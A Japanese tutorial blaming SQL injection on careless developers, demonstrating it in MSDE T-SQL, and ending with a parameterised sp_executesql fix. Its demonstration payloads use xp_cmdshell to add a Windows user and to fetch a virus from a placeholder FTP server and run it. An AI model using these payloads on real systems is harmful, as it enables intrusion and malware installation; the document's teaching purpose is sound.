ただ世間一般の大多数の人間は、SQL インジェクション攻撃が、その他のセキュリティホールを利用した攻撃と同一レベルの攻撃だと勘違いしている人が多いので、そのような人達は、OSや製品が悪い!と言いふらすかもしれません（濡れ衣です）。

[ SQL インジェクション:0020]で説明したように、SQL インジェクション攻撃は、データベースを使用した環境ならば、必ず対策を取らなければいけない基本的なものです。その基本が守られていなかったという事実が世間に公表されることによって、他のセキュリティホールを利用した攻撃を受けた場合に比べて、弁解のしようがありません。

もし記者会見で、被害を受けた会社の社長が、「当社は万全のセキュリティ対策やコストを投じて、顧客情報を守っております。なぜ、顧客情報が漏えいしたのか、原因は不明であり、ただ今、調査中です」と発言し、後日その原因が、「SQL インジェクションでした」と言ってしまったら、笑い者になってしまいます。
SQL インジェクション対策は、データベースアプリケーションを開発するときに実施すべきで、そのような基本的な対策をしていなかったデータベースアプリケーションを運用していたこと自体が異常なことなのです。

また発注者側に、データベース製品ベンダーが実施しているデータベースの資格試験の資格取得者を雇用している場合は、その人がなぜ開発業者を監督しなかったのか？という問題が出るかもしれません。

一番悪いのは開発を請け負った業者ですが、SQL インジェクション攻撃を受けるかどうかは、業者の成果物を見れば、一目でわかります。そのような検収作業を手抜きした発注者側にも責任があります

おかしなSQL文を実行すること自体は、データベースシステムの正しい動作です。その動作を強制的に止めることはできません。問題は、そのようなおかしなSQL文を作成したデータベースアプリケーション側に責任があります。

例えば、データベースの名前（文字列）を与えて、そのデータベースが存在するかどうか調べるSQL文を次のように作成しました。

declare @dbname sysname
declare @sql    varchar(500)

--検索を行なうデータベースの名前を、パラメータとする
select @dbname = 'master'

--この組み立てたSQL文に、インジェクション攻撃が潜みます
--MSDE のSQL文の文法に従って、単純に文字列の連結を行ないます
select @sql  =  'select cast(name as varchar(20))  from master.dbo.sysdatabases  ' 
                      + 'where  name= ''' + @dbname + ''''

--SQL文の実行
exec( @sql  )

上記のSQL文を実行すると正しい結果が表示されます。

         select @dbname = 'master'

上記の代入命令を、次のように、書き換えて実行してください

  select @dbname = 'UnKnownDB''  select getdate()  ''A'

上記のSQL文を実行すると、次のような結果が表示されます。

プログラムの開発者本人は、@dbnameパラメータは「データベースの名前」が代入されると確信？しています。ところが実際は開発者の想定とは異なる文字列が代入され、SQL文が実質的には２つのSQL文の命令に置き換わってしまいました。

このように文字列を連結して、SQL文を組み立てて実行する場合、おかしな文字列が混入することによって、SQL文が誤動作するのが、SQL インジェクション攻撃の特徴です。

         select @dbname = 'master'

上記の代入命令を、次のように、書き換えて実行してください

select @dbname = 'UnKnownDB''  exec xp_cmdshell ''net user User-A Pass-A /add''  
   declare @dum varchar(10)  select @dum=''1'
(上記は１行で記述しています）

上記のSQL文を実行すると、データベースサーバーを実行しているWindowsに、ユーザ名User-A、パスワードPass-AのWindowsユーザが登録されます。

Web等の外部からパラメータ文字列が入力されることを想像してください。攻撃者に、Windows上に新しいユーザを作成されてしまいます。

【注意】
この攻撃を成功させるためには、データベースサービスの実行アカウントを「ローカルシステム」や「Administrator」で実行していることが条件になります

         select @dbname = 'master'

上記の代入命令を、次のように、書き換えて実行してください

select @dbname = 'UnKnownDB''  exec xp_cmdshell ''echo FTPログインユーザ名>ftpcmd.txt'' 
 exec xp_cmdshell ''echo FTPパスワード>>ftpcmd.txt'' 
 exec xp_cmdshell ''echo cd FTPサーバーのディレクトリ>>ftpcmd.txt''
 exec xp_cmdshell ''echo get ウィルスファイル名>>ftpcmd.txt''
 exec xp_cmdshell ''ftp -s:ftpcmd.txt ウィルスを格納したサーバーIPアドレス''
 exec xp_cmdshell ''c:\windows\system32\ウィルスファイル名'' 
 declare @dum varchar(10)  select @dum=''1'
(上記はすべて１行で記述しています)

上記のSQL インジェクション攻撃は、文字列が長過ぎて、幸いにも失敗します。
declare @dbname varchar(1000)のように、大きく宣言していると成功します。

ウィルスを格納したFTPサーバーからウィルスをダウンロードして、そのウィルスを実行するのは、特別難しいことではありません。

FTPコマンドは、標準のWindowsシステムに組み込まれています。

【注意】
この攻撃を成功させるためには、データベースサービスの実行アカウントを「ローカルシステム」や「Administrator」で実行していることが条件になります

declare @dbname sysname
declare @sql    nvarchar(500)

--検索を行なうデータベースの名前を、パラメータとする
select @dbname = 'UnKnownDB'' 以下省略

--@dbnameは、文字列の中に、そのまま表現する
select @sql  =  N'select cast(name as varchar(20))  from ' +
                        'master.dbo.sysdatabases  where  name= @dbname'          

--SQL文の実行
exec sp_executesql  @sql  ,  N'@dbname sysname' , @dbname